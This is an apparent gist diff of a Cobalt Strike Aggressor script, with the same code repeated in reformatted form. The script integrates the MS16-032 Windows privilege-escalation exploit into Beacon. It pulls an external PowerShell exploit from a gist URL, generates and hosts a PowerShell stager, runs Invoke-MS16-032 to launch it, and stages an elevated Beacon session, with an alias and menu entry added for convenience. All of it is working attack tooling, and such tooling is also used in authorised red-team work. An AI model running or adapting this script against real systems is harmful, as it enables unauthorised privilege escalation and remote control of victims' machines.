rsmudge · July 29, 2016 04:11
diff --git a/ms16-032.cna b/ms16-032.cna
 # Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
 #
 # 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
 # 1. grab MS16-032.ps1 
 # https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
 # 2. store it with this script
 # 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack

 # logic to run this particular attack
 sub exploit {
 	local('$script $oneliner');

 	# acknowledge this command
 	btask($1, "Tasked Beacon to run " . listener_describe($2) . " via ms16-032");

 	# generate a PowerShell script to run our Beacon listener
 	$script = artifact($2, "powershell");

 	# host this script within this Beacon
 	$oneliner = beacon_host_script($1, $script);

 	# task Beacon to run this exploit with our one-liner that runs Beacon
 	bpowershell_import($1, script_resource("MS16-032.ps1"));
 	bpowerpick($1, "Invoke-MS16-032 \" $+ $oneliner $+ \"");

 	# complete the staging process
 	bstage($1, $null, $2);
 }

 # an alias to run this attack, use:
 # beacon> ms16-032 "listener name"
 # beacon> ms16-032
 alias ms16-032 {
 	if ($2 is $null) {
 		openPayloadHelper(lambda({
 			exploit($bid, $1);
 		}, $bid => $1));
 	}
 	else if (listener_info($2) is $null) {
 		berror($1, "Could not find listener $2");
 	}
 	else {
 		exploit($1, $2);
 	}
 }

 # register help for this command
 beacon_command_register("ms16-032", "Runs ms16-032 privilege escalation", "Synopsis: ms16-032 \"[listener]\"\n\nExecute this attack");

 # create a popup menu to launch this attack too!
 popup beacon_bottom {
 	item "&ms16-032" {
 		openPayloadHelper(lambda({
 			openOrActivate($bids);
 			binput($bids, "ms16-032 \" $+ $1 $+ \"");
 			exploit($bids, $1);
 		}, $bids => $1));
 	}
 }
	# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon
	#
	# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later)
	# 1. grab MS16-032.ps1
	# https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1
	# 2. store it with this script
	# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack

	# logic to run this particular attack
	sub exploit {
	local('$script $oneliner');

	# acknowledge this command
	btask($1, "Tasked Beacon to run " . listener_describe($2) . " via ms16-032");

	# generate a PowerShell script to run our Beacon listener
	$script = artifact($2, "powershell");

	# host this script within this Beacon
	$oneliner = beacon_host_script($1, $script);

	# task Beacon to run this exploit with our one-liner that runs Beacon
	bpowershell_import($1, script_resource("MS16-032.ps1"));
	bpowerpick($1, "Invoke-MS16-032 \" $+ $oneliner $+ \"");

	# complete the staging process
	bstage($1, $null, $2);
	}

	# an alias to run this attack, use:
	# beacon> ms16-032 "listener name"
	# beacon> ms16-032
	alias ms16-032 {
	if ($2 is $null) {
	openPayloadHelper(lambda({
	exploit($bid, $1);
	}, $bid => $1));
	}
	else if (listener_info($2) is $null) {
	berror($1, "Could not find listener $2");
	}
	else {
	exploit($1, $2);
	}
	}

	# register help for this command
	beacon_command_register("ms16-032", "Runs ms16-032 privilege escalation", "Synopsis: ms16-032 \"[listener]\"\n\nExecute this attack");

	# create a popup menu to launch this attack too!
	popup beacon_bottom {
	item "&ms16-032" {
	openPayloadHelper(lambda({
	openOrActivate($bids);
	binput($bids, "ms16-032 \" $+ $1 $+ \"");
	exploit($bids, $1);
	}, $bids => $1));
	}
	}